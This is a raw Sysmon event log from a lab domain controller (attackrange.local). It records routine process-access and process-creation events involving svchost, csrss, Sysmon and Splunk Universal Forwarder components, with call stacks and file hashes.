13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42A2-6000-7800-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A2-6000-7800-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.061{08A6967A-42A2-6000-7800-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A3-6000-7A00-000000009A01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-42A3-6000-7A00-000000009A01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.915{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A3-6000-7A00-000000009A01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.748{08A6967A-42A3-6000-7A00-000000009A01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A2-6000-7900-000000009A01}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+